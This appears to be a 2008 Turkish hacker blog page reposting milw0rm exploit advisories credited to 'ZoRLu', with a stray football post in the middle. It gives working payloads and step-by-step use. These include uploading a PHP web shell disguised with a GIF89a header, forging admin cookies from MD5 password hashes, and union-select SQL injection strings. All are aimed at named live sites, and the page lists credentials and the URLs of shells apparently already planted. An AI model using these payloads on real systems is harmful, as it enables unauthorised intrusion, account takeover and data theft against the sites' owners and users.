http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php

XSS example:

http://www.apt.cc/listtest.php?r=[XSS]

---------------------------------------------------------------------------

you must have a minimal shell ( example 40 kb ) (kucuk bir shell in olmalI )

and you add this code your shell to head

GIF89a; (en uste bu kodu ekle )

example your_shell.php:

GIF89a;

...

...

...

?>

and save your_sheell.php ( isim ver ve kaydet )

----------------------------------------------------------------------------

you must register to site ( direckt register link: http://localhost/script_path/registerlandlord.php ) ( siteye uye ol )

and login ( direckt link: http://localhost/script_path/Member_Admin/index.php ) ( giris yap )

after edit your banner ( direckt link: http://localhost/script_path/Member_Admin/editimage.php?clientid=[MemberAdminPass] )

or first click "Edit Account Info" after click "Your Logo" Edit button ( "Edit Account Info" yazýsýna tIkla sonra da edit butonuna tIkla )

and open new page. you click gozat button and select your_sheell.php ( acIlan yeni sayfada senin hazIr shell i upload et )

after click to submit button. you should see "Your image will be review." ( "Your image will be review." bu yazIyI gormelisin )

if you see "Your image will be review." your shell upload succesfull. ( gorduysen yukleme basarIlI )

after repeat click to "Edit Account Info" and open page. your logo right click and properties select this link copy

after paste your explorer go your_shell.php ( sonra yine "Edit Account Info" yazIsIna Týkla

acIlan sayfada logonun ustunde sag tIkla ozellikleri Týkla linki kopyala sonrada shelle ulas )


your_shell.php

http://localhost/script_path/Member_Admin/logo/[id]your_shell.php

-------------------------------------------------------------------------------

example 1 (demo):

http://www.downlinegoldmine.com/apartment/Member_Admin/index.php

email: zorlu@w.cn

password: 123456

or direckt going: http://www.downlinegoldmine.com/apartment/Member_Admin/login.php?c=4806666

edit logo: http://www.downlinegoldmine.com/apartment/Member_Admin/editimage.php?clientid=4806666

and shell.php

http://www.downlinegoldmine.com/apartment/Member_Admin/logo/b50f9cbff100ae4e8a581a9f1a8shell.php


example 2:

http://www.apt.cc/Member_Admin/index.php

email: zorlu@w.cn

password: 123456

or direckt going: http://www.apt.cc/Member_Admin/login.php?c=4871187

edit logo: http://www.apt.cc/Member_Admin/editimage.php?clientid=4871187

and shell.php

http://www.apt.cc/Member_Admin/logo/cca55760b985b02c1b9d7fac606shell.php

Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability

Article Publisher PRO 1.5 Insecure Cookie Handling Vulnerability

link: http://www.milw0rm.com/exploits/6929

Discovered By: ZoRLu

demo admin login:

http://demo-article-publisher-pro.phparticlescript.com/admin/admin.php

demo user login:

http://demo-article-publisher-pro.phparticlescript.com/login.php


admin_name: admin

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 1

or

user_name: zorlu

passwd: zorlu

passwd_md5: 2178fb3ee4a88f946ecb68734b266c10

user_id: 6

or

user_name: demo

passwd: demo

passwd_md5: fe01ce2a7fbac8fafaed7c982a04e229

user_id: 2


exploit:

admin:

javascript:document.cookie = "xadmin=user_id%2Cpasswd_md5; path=/";

user:

javascript:document.cookie = "user=user_id%2Cpasswd_md5; path=/";

for demo admin: ( user_id: 1)

javascript:document.cookie = "xadmin=1%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";

for demo user: ( for user zorlu user_id: 6 )

javascript:document.cookie = "user=6%2C2178fb3ee4a88f946ecb68734b266c10; path=/";

for demo user: ( for user demo user_id: 2 )

javascript:document.cookie = "user=2%2Cfe01ce2a7fbac8fafaed7c982a04e229; path=/";


1 Kasım 2008 Cumartesi

SFS EZ Webstore (where) Remote SQL Injection Vulnerability

SFS EZ Webstore (where) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/6922

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/SearchResults.php?SearchTerm=ZoRLu&where=[SQL]

[SQL]=

ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*

demo

http://turnkeyzone.com/demos/store/SearchResults.php?SearchTerm=ZoRLu&where=ItemDescription+union+select+1,concat(user(),0x3a,database(),0x3a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16/*


SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability

SFS EZ Gaming Cheats (id) Remote SQL Injection vulnerability

link: http://www.milw0rm.com/exploits/6924

Discovered By: ZoRLu

Exploit:

http://localhost/script_path/view_reviews.php?id=[SQL]

[SQL]=

-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--

demo

http://turnkeyzone.com/demos/cheats/view_reviews.php?id=-999999999+union+select+1,2,concat(user(),0x3a,database(),0x3a,version()),4,5,6,7,8,9--


eskişehir fenerbahçe maç bitti 2-2

maç bitti fenerbahçe hüsrana uğradı ne diyelim geçmiş olsun :)

eskişehir fenerbahçe maçı

şuan maçı izliyorum ulan helal olsun eskişehire. ben Galatasaraylıyım ama adamlar hem Galatasaray'a hemde fenerbahçeye alın teri döktürdüler. biliyorsunuz Cimbom yenildi bakalım fenerbahçe napacak skor şuan 2-2 ve dakka 68 : )

Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability

Logz podcast CMS 1.3.1 (add_url.php art) SQL Injection Vulnerability

kaynak: http://www.milw0rm.com/exploits/6896

Discovered By: ZoRLu

file:

fichiers/add_url.php

code:

if (isset($_GET['art'])) {
$Article = $_GET['art'];

...

$Requete = "SELECT TITRE FROM ".TABLEARTICLES." WHERE ID = '".$Article."' ".$Conditions;
$ResultRequete = requete_mysql($Requete);



Exploit:

http://localhost/script_path/fichiers/add_url.php?art=[SQL]

[SQL]= column number 1 (SELECT TITRE FROM ...)

1'+union+select+concat(user(),0x3a,database())/*

example:

http://example.com/scripth_path/fichiers/add_url.php?art=1'+union+select+concat(user(),0x3a,database())/*
 
Dizi